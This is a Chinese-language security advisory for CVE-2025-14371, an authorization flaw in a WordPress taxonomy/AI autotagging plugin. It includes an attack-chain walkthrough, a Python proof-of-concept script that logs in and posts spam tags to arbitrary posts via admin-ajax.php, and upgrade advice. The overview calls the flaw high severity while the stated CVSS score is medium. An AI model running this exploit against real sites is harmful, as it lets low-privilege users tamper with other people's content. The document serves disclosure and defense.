CVE-2025-14371 WordPress Taxonomy Manager AI插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-14371

漏洞类型

权限控制缺失

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI plugin for WordPress

漏洞概述

CVE-2025-14371是WordPress插件TaxoPress AI Autotagger中的一个高危安全漏洞。该插件是WordPress广受欢迎的标签、分类和分类法管理工具，集成了OpenAI自动标签功能。漏洞源于插件在3.41.0及以下所有版本中，对taxopress_ai_add_post_term函数缺少适当的权限验证（capability check）。这意味着任何已认证用户，只要拥有Contributor级别或更高权限，即可绕过正常的权限检查，对站点内任意文章执行添加或删除标签、分类的操作。攻击者可以利用此漏洞修改不属于自己创作的内容，破坏网站内容结构，或通过添加恶意标签进行SEO spam。由于该插件被广泛应用于各类WordPress站点，此漏洞可能影响大量网站的内容完整性和安全性。CVSS评分4.3属于中等严重程度，但考虑到攻击的便捷性和潜在影响范围，仍需及时修复。

技术细节

漏洞根源在于WordPress插件TaxoPress AI Autotagger（版本<=3.41.0）的TaxoPressAiAjax.php文件中，对taxopress_ai_add_post_term AJAX操作函数缺少current_user_can()权限检查。正常的WordPress安全实践要求对任何涉及数据修改的操作进行用户权限验证，但该函数直接处理POST请求中的term数据，未验证当前用户是否有权限修改目标文章的分类法。攻击者只需构造包含post_id和terms参数的AJAX请求，即可指定任意文章ID并修改其关联的标签或分类。WordPress的Contributor角色本应只能编辑自己发布的文章，但此漏洞允许修改任何用户的文章内容。攻击可通过wp-admin/admin-ajax.php端点发起，请求体包含action=taxopress_ai_add_post_term、post_id（目标文章ID）、taxonomy（分类法类型如post_tag或category）以及terms（标签名称数组）等参数。服务器端直接将这些数据写入数据库，导致未授权的分类法修改。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本及TaxoPress AI Autotagger插件版本（需<=3.41.0），确认插件已启用且存在漏洞端点wp-admin/admin-ajax.php

STEP 2

步骤2: 账户获取

攻击者获取目标WordPress站点的用户账户，需要至少Contributor级别权限。可通过默认注册、弱口令或社会工程学手段获取有效凭据

STEP 3

步骤3: 认证会话建立

使用获取的凭据通过wp-login.php登录WordPress，建立认证会话并获取wordpress_logged_in cookie

STEP 4

步骤4: 构造恶意请求

构造AJAX请求到wp-admin/admin-ajax.php，设置action为taxopress_ai_add_post_term，指定任意目标文章ID、分类法类型和要添加的标签数据

STEP 5

步骤5: 权限绕过执行

发送构造的AJAX请求，由于函数缺少current_user_can()验证，服务器直接处理请求，将攻击者指定的标签/分类添加到目标文章

STEP 6

步骤6: 验证与持久化

攻击者验证标签已成功添加，实现对任意文章内容的未授权修改，可用于SEO spam、内容污染或破坏网站结构

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14371 PoC - WordPress TaxoPress AI Autotagger Unauthorized Term Modification
# Target: Tag, Category, and Taxonomy Manager - AI Autotagger with OpenAI plugin <= 3.41.0

target_url = "http://target-wordpress-site.com"
# Authentication: Attacker needs Contributor-level account
username = "attacker_username"
password = "attacker_password"

# Target post to modify (any post ID, not owned by attacker)
target_post_id = 123

# Create WordPress session
session = requests.Session()

# Login to WordPress
login_url = f"{target_url}/wp-login.php"
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': '/wp-admin/',
    'testcookie': '1'
}

response = session.post(login_url, data=login_data)
if 'wordpress_logged_in' not in str(session.cookies):
    print("[-] Login failed")
    sys.exit(1)

print("[+] Login successful")

# Exploit: Add unauthorized terms to target post
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
exploit_data = {
    'action': 'taxopress_ai_add_post_term',
    'post_id': target_post_id,
    'taxonomy': 'post_tag',  # or 'category'
    'terms': '["malicious-tag", "spam-keyword"]'
}

response = session.post(ajax_url, data=exploit_data)

if response.status_code == 200:
    print(f"[+] PoC executed - Terms added to post ID {target_post_id}")
    print(f"[+] Response: {response.text}")
else:
    print(f"[-] Exploit failed with status code: {response.status_code}")

影响范围

TaxoPress AI Autotagger (WordPress插件) <= 3.41.0

防御指南

临时缓解措施

立即将TaxoPress AI Autotagger插件升级到3.41.1或最新版本；若暂时无法升级，可临时禁用TaxoPress AI Autotagger模块或整个插件；同时审查并限制WordPress用户角色权限，撤销不必要的Contributor账户，并对网站进行全面安全审计以排查是否存在已被利用的痕迹。